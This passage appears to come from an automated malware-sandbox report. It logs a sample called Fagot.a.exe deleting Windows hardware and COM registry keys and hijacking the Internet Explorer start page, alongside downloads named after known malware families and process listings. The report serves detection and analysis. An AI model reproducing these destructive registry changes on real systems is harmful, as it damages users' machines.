| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus\0000 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\FloatingPointProcessor | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoAdapterBusses\PCIBus | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "www.blacksnake.com" | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8D6EED60-2737-4425-B38A-490EF273ACBB} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E29BE61-5809-443F-9B5D-CF22156694EB}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7CE3E768-654D-4BA7-8D95-CDAAC642B141}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6D4B9C3E-CC05-493F-85E2-43D1006DF96A} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{51A21C32-DD1F-4D3C-85F1-6F8A6172CA82}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E93527E9-EA10-5AA7-B8AA-FEA866294704} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9CA277DB-FE42-53B1-AE3B-098E51FA6A9B}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41A7D761-6018-11CF-9016-00AA0068841E}\ProxyStubClsid | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{41487E33-9A10-42FE-BA3B-15FDE59D09D5} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3580A828-07FE-4B94-AC1A-757D9D2D3056}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0EA91CF7-8542-4780-8D6B-7BD686CD2471} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00000205-0000-0010-8000-00AA006D2EA4}\2.5 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{B3AADFEA-8404-4CBE-A62E-B0B715412C9E} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{d27b8d1f-26c0-4ed2-a8b0-cf2e4c374771} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3F1B099B-9507-4CC0-BDD5-CD04DC0C870E} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2090CCFC-70C5-491D-A5E8-BAD2DD9EE3EA}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90A7734E-841B-4F77-9384-A2891E76E7E2}\NumMethods | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7C2AAE9E-6178-4A88-8904-B57169B655EA} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FC098A45-913B-4914-B6C3-AE6304593E75}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7500A6BA-EB65-11D1-938D-0000F87557C9}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{305106E7-98B5-11CF-BB82-00AA00BDCE0B}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3051046C-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{00000206-0000-0010-8000-00AA006D2EA4}\2.6 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C11E0649-8237-5C93-BBDB-2EDA5216FD3F} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{42abdf9f-14a6-5c1f-839b-86029505b1d0} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{79EAC9C5-BAF9-11CE-8C82-00AA004BA90B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{60F49115-CE92-4F96-8D0A-81CCCAE4AB77} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{87379803-2FAD-4801-ABDF-218B5D2F076F}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\NumMethods | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1525E844-B912-4558-85CF-B1A3FE27D354}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EB2114C0-CB02-467A-AE4D-2ED171F05E6A} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{EE44CF5F-179A-484A-BB16-AD94F97C0ACB}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C892D1C9-0E80-431C-ACF7-58BEBC0C405D} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7d2312d0-f3a2-5091-8a5e-41832e632c08} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{607a20bf-32b4-5b8e-a793-3024f8d3582a} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1E1760CE-126F-46CA-9734-91A6CBF8B6F3}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{1B468D97-6A90-4E92-9F0E-90BACC6AC8C9}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4AC9E1DA-5BAD-4AC7-86E3-24F4CDCECA28}\c.0\0\Win64 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{C5B6042B-FD21-404A-A0EF-E2FBB52B9080}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF032216-2C7F-4682-84C1-76EF432D840B}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{9d82379d-4958-558e-a155-3a809bb16c04} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{521B4726-04E9-47E7-B3A5-CD93A7F74F5B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{ED25831F-90DB-498D-A7B4-EBCE807D3C23}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{844dff12-dc13-5f0c-ae3b-e71a4dcce062} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{674DCE15-B9C9-5EC9-B058-AABA6F976C16} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{30510722-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E757B2F5-E73E-434E-A1BF-2BD7C3E60FCB} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{DD0AEB24-0EFE-5548-8448-E153D4903DF7} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D64F9DD5-6446-4B26-8C4D-927946908844} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A60384F6-3712-4CB3-BC46-81E6402FEE99}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9F3FDF1-7B6D-4899-BD94-72E4D4ACD2E1}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7fe52e32-867c-52a3-b3b7-d4dd4d573794} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7E7A4999-92F1-4E88-AE3E-C0854212C635}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{683D7FC9-8697-4309-994E-E8A2C5628884}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{83504C13-A417-5601-9ADB-F1FF18294DC9}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69D14C80-C18E-11D0-A9CE-006097942311}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{6b5828d7-6b8d-58c4-ba3a-9f796710f53c} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{3050F1C5-98B5-11CF-BB82-00AA00BDCE0B} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D8D2DDA0-FD33-4B6A-9A67-E8C9FB471034} | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{AFDBA726-047A-4B83-B8C7-D812FE9CAA5C}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{66BB2F51-5844-4997-8D70-4B7CC221CF92}\TypeLib | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{AC0714F2-3D04-11D1-AE7D-00A0C90F26F4}\1.0\0\win64 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B5B0D747-D4D2-4E2D-872D-74DA22037826}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{54B61A02-4823-42EC-9648-A9AE80CDA270}\ProxyStubClsid32 | C:\Users\Admin\Downloads\Fagot.a.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Mabezat.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Floxif.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\ProcessExplorer.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\AgentTesla.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\NetWire.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\BabylonClient12.msi:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Fagot.a.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Walker.com:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\MadMan.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| File created | C:\Users\Admin\Downloads\Gnil.exe:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://www.majorgeeks.com/files/details/microsoft_process_explorer.html"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://www.majorgeeks.com/files/details/microsoft_process_explorer.html
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1956 -prefMapHandle 1948 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7caa1cc7-a812-4986-9451-9459a85bedc3} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e6b1b8-df3d-4799-9dac-178d5762a78a} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3136 -childID 1 -isForBrowser -prefsHandle 3148 -prefMapHandle 3144 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8f1e14c-86c7-45ce-88af-6621343d261b} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3628 -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 2632 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {08ac5fdf-d50b-4845-a1bd-0a32154e9960} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4448 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4440 -prefMapHandle 4436 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {48c90701-caa1-473c-a6cd-aa5bfc019fc8} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5544 -childID 3 -isForBrowser -prefsHandle 5572 -prefMapHandle 5568 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5d14e0cb-2f9b-47c9-8585-a770bb19e6c2} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5640 -childID 4 -isForBrowser -prefsHandle 5684 -prefMapHandle 5692 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1028 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f054924d-a14b-430f-a7c0-62e54d651bcb} 3656 "\\.\pipe\gecko-crash-server-pipe.3656" tab
C:\Program Files\Mozilla Firefox\firefox.exe
